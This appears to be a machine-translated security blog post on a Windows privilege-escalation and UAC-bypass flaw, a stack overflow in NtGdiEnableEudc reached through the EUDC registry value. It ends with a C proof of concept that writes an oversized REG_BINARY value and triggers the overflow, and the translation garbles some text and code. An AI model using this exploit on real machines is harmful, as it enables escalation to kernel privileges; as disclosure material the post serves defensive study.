10:19 New vulnerability allows an increase in franchise win7/vista bypass uac | |
Interesting to increase the vulnerability of local privileges to system-level, appeared on November 24 in an article in the resource The Code Project (http://www.codeproject.com/KB/vista-security/uac.aspx). Just a few hours it was removed from this resource, but the information has spread across the network and in my opinion to remove it was pointless. Increase the benefits you can work on systems from XP and up Vista/Win7, and server versions, too, are under attack. And what's even more interesting vulnerability is relevant, both on x86 systems, and on x64. True submitted PoC code was successfully run only on x86 systems. All because of lack of control parameters of the function WinAPI RtlQueryRegistryValues ??(): NTSTATUS RtlQueryRegistryValues ??( __in ULONG RelativeTo, __in PCWSTR Path, __inout PRTL_QUERY_REGISTRY_TABLE QueryTable, __in_opt PVOID Context, __in_opt PVOID Environment ); This function is used to obtain several registry settings and exit _RTL_QUERY_REGISTRY_TABLE fills the structure with the results. Typedef struct _RTL_QUERY_REGISTRY_TABLE { PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; ULONG Flags; PWSTR Name; PVOID EntryContext; ULONG DefaultType; PVOID DefaultData; ULONG DefaultLength; } RTL_QUERY_REGISTRY_TABLE, * PRTL_QUERY_REGISTRY_TABLE; In the EntryContext, this structure is determined by the type of output buffer and here there is an interesting nuance to the buffer can be interpreted as a UNICODE_STRING structure or as a buffer of ULONG values. Typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; On completion of this buffer is determined by the type of key Registry, to which the request was made. All is good, but was found the registry key HKCU \ EUDC \ [Language] \ SystemDefaultEUDCFont, which can only be accessed with user rights and change its type to REG_BINARY by calling a function Win32k.sys-> NtGdiEnableEudc (). In operation, this function assumes that the registry value is REG_SZ and the buffer is placed in the stack as UNICODE_STRING structure from which the first value ULONG interprets the length of the buffer, but if the registry value is represented as REG_BINARY, then a classic stack overflow. With all these nuances was developed PoC (by noobpwnftw), which creates the registry value is overwritten the return address on the stack buffer and execute arbitrary code in kernel mode. Detailed description of the vulnerability lies here http://www.kb.cert.org/vuls/id/529673 http://secunia.com/advisories/42356 Alternative PoC from d_olex (original): # define EUDC_FONT_VAL "SystemDefaultEUDCFont" int _tmain (int argc, _TCHAR * argv []) { HKEY hKey; char szKeyName [MAX_PATH], Buff [0x600]; sprintf_s (szKeyName, MAX_PATH, "EUDC \ \% d", GetACP ()); / / create the registry key LONG Code = RegCreateKey (HKEY_CURRENT_USER, szKeyName, & hKey); if (Code! = ERROR_SUCCESS) ; { printf ("ERROR: RegCreateKey () fails with status% d \ n", Code); return -1; } / / delete the old parameter RegDeleteValue (hKey, EUDC_FONT_VAL); / / create a new parameter "SystemDefaultEUDCFont" type REG_BINARY FillMemory (Buff, sizeof (Buff), 'A'); Code = RegSetValueEx (hKey, EUDC_FONT_VAL, 0, REG_BINARY, Buff, 0x600 ); RegCloseKey (hKey); if (Code! = ERROR_SUCCESS) { ; printf ("ERROR: RegSetValueEx () fails with status% d \ n", Code); return -1; } / / call the vulnerable function EnableEUDC (TRUE); return 0; } | |
|
Total comments: 0 | |